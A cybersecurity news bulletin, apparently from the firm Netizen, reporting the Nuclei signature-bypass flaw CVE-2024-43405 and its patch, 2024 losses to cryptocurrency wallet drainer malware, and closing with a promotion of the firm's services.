Today’s Topics:

• Critical Nuclei Vulnerability Enables Signature Bypass and Code Execution
• Wallet Drainer Malware Steals Nearly $500 Million in Cryptocurrency in 2024
• How can Netizen help?

Critical Nuclei Vulnerability Enables Signature Bypass and Code Execution

A high-severity vulnerability has been uncovered in ProjectDiscovery’s Nuclei, a popular open-source vulnerability scanner. The flaw, tracked as CVE-2024-43405, carries a CVSS score of 7.4 and could allow attackers to bypass signature checks and execute malicious code, posing significant risks to users.

The issue, affecting all Nuclei versions beyond 3.0.0, arises from a discrepancy in how signature verification and the YAML parser handle newline characters. This discrepancy, combined with the processing of multiple signatures, creates an opening for attackers to inject malicious content into a template while retaining a valid signature for the non-malicious portion.

Nuclei uses YAML-based templates to probe applications, infrastructure, cloud platforms, and networks for security flaws. The discovery, made by cybersecurity firm Wiz, reveals that the signature verification process—a critical component ensuring template integrity—is vulnerable. Exploiting this flaw allows attackers to bypass verification, craft malicious templates, and execute arbitrary code on the host system.

At the core of the vulnerability is the misuse of regular expressions (regex) in the signature validation process. The conflict arises when regex-based verification interacts with the YAML parser, which treats certain characters differently. Specifically, an attacker can introduce a “\r” character, which regex interprets as part of the same line, but the YAML parser reads as a line break. This mismatch allows the injection of additional “# digest:” lines that evade verification yet are executed by the YAML interpreter.

“The verification logic only validates the first ‘# digest:’ line,” explains Wiz researcher Guy Goldenberg. “Additional lines are ignored during verification but remain executable by the YAML parser, creating a significant security gap.”

The vulnerability highlights a critical weakness in Nuclei’s template verification process, making it a single point of failure for ensuring template integrity. Organizations running untrusted or community-contributed templates are particularly at risk, as attackers could exploit this to execute arbitrary commands, exfiltrate data, or compromise systems.

Following responsible disclosure, ProjectDiscovery addressed the issue on September 4, 2024, with the release of Nuclei version 3.3.2. Users are strongly urged to update to the latest version, 3.3.7, to mitigate potential risks.

“Attackers could craft templates with manipulated ‘# digest’ lines or strategically placed ‘\r’ line breaks to bypass verification,” Goldenberg notes. “Without proper validation or isolation, these malicious templates can lead to severe consequences, including system compromise and data breaches.”

Wallet Drainer Malware Steals Nearly $500 Million in Cryptocurrency in 2024

In 2024, wallet drainer malware emerged as a major threat in the cryptocurrency space, resulting in the theft of nearly $500 million from over 332,000 victims. According to Scam Sniffer, a firm specializing in anti-scam solutions, these attacks marked a 67% increase compared to the previous year, making it one of the most lucrative avenues for cybercriminals.

Wallet drainer malware operates by deceiving users into authorizing malicious transactions, thereby allowing attackers to siphon off their funds. The largest single theft recorded in 2024 amounted to $55.48 million, highlighting the devastating impact of these attacks. Despite the staggering total losses, only 30 incidents resulted in losses exceeding $1 million each, contributing to a combined total of $171 million.

The first quarter of the year was particularly harsh, with over 175,000 victims losing $187.2 million. Although the frequency of attacks decreased in the latter half of the year, significant heists continued, with the most notable incidents occurring in August and September, where losses of $55.48 million and $32.51 million were reported.

Scam Sniffer attributed the surge in early 2024 to a peak in phishing activities. However, as the year progressed, the decline in activity was linked to market adjustments and the exit of prominent wallet drainer groups like Pink and Inferno. Despite this reduction, the cumulative impact of these attacks remained severe.

Complementing these findings, Chainalysis reported that overall cryptocurrency thefts in 2024 exceeded $2.2 billion. A significant portion of this was attributed to state-sponsored attacks, including a $308 million Bitcoin heist by North Korean hackers in December, underscoring the growing sophistication and international reach of cryptocurrency-related cybercrime.

How Can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.